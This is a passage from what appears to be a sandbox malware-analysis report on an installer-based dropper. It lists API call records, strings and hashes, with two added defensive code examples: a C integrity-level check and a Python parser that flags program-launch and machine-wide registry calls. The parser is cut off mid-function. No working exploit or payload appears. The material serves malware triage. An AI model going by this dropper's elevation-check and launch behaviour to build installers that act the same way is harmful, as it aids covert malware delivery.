                                                                                                      • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
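The record above lists the call chain GetCurrentProcess -> OpenProcessToken -> GetTokenInformation -> CloseHandle with the logged constants 0x00000008 (TOKEN_QUERY) and 0x12 (TokenIntegrityLevel), which is the standard way a process reads its own mandatory integrity level before deciding whether it needs to relaunch elevated. The following is an added example written for this report, not code from the analysed sample or from Joe Sandbox: it reproduces that API sequence (compiled only under _WIN32, with a size-query call followed by the real call, and the token handle closed on every path) and decodes the SID that GetTokenInformation returns into the integrity RID. The decoder is portable and is exercised against a constructed S-1-16-8192 (medium integrity) SID; the level names and RID thresholds are the documented S-1-16 values, and the helper names are this example's own.

```c
/* Added example (not from the analysed sample or from Joe Sandbox):
 * the TokenIntegrityLevel check behind the API chain in the record above,
 * plus a portable decoder for the mandatory-label SID it returns.
 * The Windows calls are compiled only under _WIN32; the decoder runs
 * anywhere and is demonstrated on a constructed S-1-16-8192 SID. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Documented integrity RIDs under the mandatory-label authority S-1-16. */
#define IL_LOW    0x1000u
#define IL_MEDIUM 0x2000u
#define IL_HIGH   0x3000u
#define IL_SYSTEM 0x4000u

/* Decode the last sub-authority of a raw SID: revision (1 byte),
 * sub-authority count (1 byte), 6-byte identifier authority, then
 * little-endian 32-bit sub-authorities.  Returns 0 on success, -1 if the
 * buffer is malformed or the SID is not under S-1-16. */
int integrity_rid_from_sid(const unsigned char *sid, size_t len, uint32_t *rid)
{
    if (!sid || !rid || len < 8 || sid[0] != 1) return -1;   /* SID revision 1 */
    unsigned count = sid[1];
    if (count == 0 || count > 15 || len < 8 + 4u * count) return -1;
    static const unsigned char mandatory_label_auth[6] = {0, 0, 0, 0, 0, 16};
    if (memcmp(sid + 2, mandatory_label_auth, 6) != 0) return -1; /* must be S-1-16 */
    const unsigned char *p = sid + 8 + 4u * (count - 1);      /* last sub-authority */
    *rid = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return 0;
}

/* Map an integrity RID to its level name (RIDs between the documented
 * values, e.g. 0x2100 "medium plus", fall into the level below them). */
const char *integrity_name(uint32_t rid)
{
    if (rid < IL_LOW)    return "untrusted";
    if (rid < IL_MEDIUM) return "low";
    if (rid < IL_HIGH)   return "medium";
    if (rid < IL_SYSTEM) return "high";
    return "system";
}

/* Constructed sample: the SID bytes GetTokenInformation(TokenIntegrityLevel)
 * yields for a normal, non-elevated process, S-1-16-8192. */
const unsigned char SAMPLE_MEDIUM_SID[12] = {
    0x01, 0x01,                         /* revision 1, one sub-authority */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x10, /* identifier authority 16       */
    0x00, 0x20, 0x00, 0x00              /* 0x2000 = 8192, little-endian  */
};

#ifdef _WIN32
#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0600             /* TOKEN_MANDATORY_LABEL needs Vista+ headers */
#endif
#include <windows.h>
/* Live check mirroring the logged sequence: TOKEN_QUERY is 0x00000008 and
 * TokenIntegrityLevel is 18 (0x12), the constants visible in the record. */
int current_process_integrity(uint32_t *rid)
{
    HANDLE tok = NULL;
    DWORD need = 0;
    int rc = -1;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) return -1;
    /* First call with no buffer only reports the required size. */
    GetTokenInformation(tok, TokenIntegrityLevel, NULL, 0, &need);
    if (need > 0 && need < 256) {
        unsigned char buf[256];
        if (GetTokenInformation(tok, TokenIntegrityLevel, buf, need, &need)) {
            TOKEN_MANDATORY_LABEL *lbl = (TOKEN_MANDATORY_LABEL *)buf;
            const unsigned char *sid = (const unsigned char *)lbl->Label.Sid;
            rc = integrity_rid_from_sid(sid, (size_t)(buf + need - sid), rid);
        }
    }
    CloseHandle(tok);                   /* closed on every path, as in the record */
    return rc;
}
#endif

int main(void)
{
    uint32_t rid = 0;
    if (integrity_rid_from_sid(SAMPLE_MEDIUM_SID, sizeof SAMPLE_MEDIUM_SID, &rid) == 0)
        printf("constructed SID -> RID 0x%04x (%s)\n", (unsigned)rid, integrity_name(rid));
#ifdef _WIN32
    if (current_process_integrity(&rid) == 0)
        printf("this process    -> RID 0x%04x (%s)\n", (unsigned)rid, integrity_name(rid));
#endif
    return 0;
}
```

On Windows the live branch prints the caller's own level (medium for a plain user session, high when run from an elevated prompt); elsewhere only the constructed SID is decoded. The size-query-then-fill pattern is what the two GetTokenInformation arguments in the record (a zero buffer first, then a real one) correspond to, and a defender reading this chain in a sample should read it as "am I already elevated?" rather than as a privilege escalation by itself.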
                                                                                                      APIs
                                                                                                      • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                      • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                      • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 2280970139-0
                                                                                                      • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                      • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                      • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                      • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                      APIs
                                                                                                      • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocHandleLockUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167344118-0
                                                                                                      • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                      • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                      • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                      • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                      Strings
                                                                                                      • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                      • API String ID: 3535843008-1938159461
                                                                                                      • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                      • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                      • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                      • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                      • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                      Strings
                                                                                                      • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveForeground
                                                                                                      • String ID: Will not restart Windows automatically.
                                                                                                      • API String ID: 307657957-4169339592
                                                                                                      • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                      • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                      • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                      • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                      APIs
                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                      • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                      Strings
                                                                                                      • Extracting temporary file: , xrefs: 004763EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileTime$Local
                                                                                                      • String ID: Extracting temporary file:
                                                                                                      • API String ID: 791338737-4171118009
                                                                                                      • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                      • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                      • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                      • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                      Strings
                                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                      • API String ID: 0-1974262853
                                                                                                      • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                      • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                      • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                      • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                      Strings
                                                                                                      • %s\%s_is1, xrefs: 00478F10
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1598650737
                                                                                                      • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                      • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                      • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                      • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMessageSendShell
                                                                                                      • String ID: open
                                                                                                      • API String ID: 812272486-2758837156
                                                                                                      • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                      • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                      • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                      • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                      APIs
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                      • String ID: <
                                                                                                      • API String ID: 893404051-4251816714
                                                                                                      • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                      • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                      • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                      • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                      • String ID: )
                                                                                                      • API String ID: 2227675388-1084416617
                                                                                                      • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                      • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                      • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                      • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window
                                                                                                      • String ID: /INITPROCWND=$%x $@
                                                                                                      • API String ID: 2353593579-4169826103
                                                                                                      • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                      • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                      • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                      • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                                      • API String ID: 3952431833-1023667238
                                                                                                      • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                      • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                      • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                      • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
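The "APIs" entries of the function records above are the fastest route to an installer's hand-off points: the RegOpenKeyExA against HKLM (handle 80000002) in the uninstall-key lookup, the ShellExecuteA whose second argument is the verb "open", and the ShellExecuteEx / GetLastError pair. The Python below is an added example written for this page; it is not Joe Sandbox or Socks5Systemz code. It parses lines in the report's `Api.MODULE(args), ref: ADDR` layout, including the indented "Part of subcall function" entries and the literal `)` argument in the RtlEnterCriticalSection record, and flags calls that launch a program or open a machine-wide registry key. The SAMPLE text is an excerpt copied from the entries above; the set of APIs treated as launch points and the HKEY handle table are my own triage choices, not something the report defines.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function table and flag calls that
launch a program or open a machine-wide registry key.  Added example for this
report page; not Joe Sandbox or Socks5Systemz code."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One API line of the table: optional bullet, optional "Part of subcall
# function XXXXXXXX:" prefix, then Api.MODULE(arg,arg,...), ref: ADDR.
# The argument group is greedy so a literal ')' argument (as in the
# RtlEnterCriticalSection record) is kept instead of ending the match early.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Predefined HKEY handles as they appear in the first RegOpenKeyEx argument
# (assumption: the report prints the raw DWORD pushed on the stack).
HKEYS = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# Calls that hand control to another program; in a dropper that is where the
# payload gets started.  Triage choice, not a report-defined list.
LAUNCH_APIS = {"CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW",
               "ShellExecuteEx", "ShellExecuteExA", "ShellExecuteExW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # stack values as printed: hex, '?', or a string literal
    ref: str                   # address of the call instruction
    subcall_of: Optional[str]  # set for "Part of subcall function" entries


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every API line found in `text`, in page order; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m.group("api"), m.group("mod"),
                                 m.group("args").split(","), m.group("ref"), m.group("sub")))
    return calls


def flag_calls(calls: List[ApiCall]) -> List[Tuple[str, str]]:
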